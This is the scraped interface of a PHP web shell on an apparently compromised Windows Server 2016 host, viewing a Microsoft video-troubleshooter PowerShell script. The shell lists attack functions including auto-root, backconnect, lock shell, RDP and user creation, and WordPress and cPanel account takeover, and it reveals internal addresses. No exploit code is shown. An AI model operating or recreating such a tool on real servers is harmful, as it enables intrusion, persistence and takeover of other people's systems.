Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
Windows /
diagnostics /
system /
Video /
[ HOME SHELL ]
Name
Size
Permission
Action
en-US
[ DIR ]
drwxrwxrwx
CL_MutexVerifiers.ps1
21.51
KB
-rw-rw-rw-
DiagPackage.diagpkg
11.67
KB
-rw-rw-rw-
DiagPackage.dll
12.5
KB
-rw-rw-rw-
RC_aud_reg_settings.ps1
1.38
KB
-rw-rw-rw-
RC_viddrv_msvideo.ps1
2
KB
-rw-rw-rw-
RC_viddrv_unsigned.ps1
2.68
KB
-rw-rw-rw-
RS_aud_reg_settings.ps1
1.13
KB
-rw-rw-rw-
RS_viddrv_msvideo.ps1
1.03
KB
-rw-rw-rw-
RS_viddrv_unsigned.ps1
1.05
KB
-rw-rw-rw-
TS_Main.ps1
2.7
KB
-rw-rw-rw-
VF_aud_reg_settings.ps1
1.2
KB
-rw-rw-rw-
VF_viddrv_msvideo.ps1
1.19
KB
-rw-rw-rw-
VF_viddrv_unsigned.ps1
1.19
KB
-rw-rw-rw-
utils_SetupEnv.ps1
11.02
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : TS_Main.ps1
# Copyright © 2013, Microsoft Corporation. All rights reserved. # ============================================================= #.... Load Utilities . ./utils_SetupEnv.ps1 #. ./CL_MutexVerifiers.ps1 #CreateUniqueGlobalFileName("VideoDRMTS") Import-LocalizedData -BindingVariable localizationString -FileName CL_LocalizationData function ispostbackOnWin8($packName) { [string] $path1 = (Get-Location -PSProvider FileSystem).ProviderPath [string] $path1 = join-path $path1 "\$packName" if(test-path $path1){ # del $path1 -force # the file is already so this must be detecting additional problem return $true } "once" > $path1 return $false } ############## MAIN ############## ##string showing### #get-diaginput -id "INT_unsigned" -parameter @{'DriverName' = "name" ; 'DriverVersion' = "Version"} #get-diaginput -id "INT_unsigned" -parameter @{'DriverName' = "name" ; 'DriverVersion' = "Version"} ############end##################### <# $ver = [Microsoft.Win32.Registry]::GetValue("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion", "CurrentVersion", "") if(($ver -lt 6.2)) { get-diaginput -id "INT_OSVersion_NotSupported" $Strings_TS_Main.ID_UNSUPPORTED_OS | ConvertTo-Xml |update-diagreport -id "TS-Main" -name "Troubleshooter Result" return } if($ver -ge 6.2) #win 8, 8.1 { if(ispostbackOnWin8 "VideoDRM") { return } } #> # Determine the version of OS. Block the pack from running on Windows older than Win8 #==================================================================================== # Operating system Version Number # --------------------------------------------- # Windows 10 10.0 # Windows 8.1 6.3 # Windows Server 2012 R2 6.3 # Windows 8 6.2 # Windows Server 2012 6.2 # Windows 7 6.1 # Windows Server 2008 R2 6.1 # Windows Server 2008 6.0 # Windows Vista 6.0 # Windows Server 2003 R2 5.2 # Windows Server 2003 5.2 # Windows XP 64-Bit Edition 5.2 # Windows XP 5.1 # Windows 2000 5.0 $temp = (Get-WmiObject -Class Win32_OperatingSystem).Version.Split(".") $OSVersion = ($temp[0] + "." + $temp[1]) if([Float]$OSVersion -lt [Float](6.2)) { get-diaginput -id "INT_OSVersion_NotSupported" $localizationString.ID_UNSUPPORTED_OS | ConvertTo-Xml |update-diagreport -id "TS-Main" -name "Troubleshooter Result" return } if([Float]$OSVersion -ge [Float](6.2)) { if(ispostbackOnWin8 "VideoDRM") { return } } .\RC_viddrv_unsigned.ps1 .\RC_viddrv_msvideo.ps1 .\RC_aud_reg_settings.ps1
Close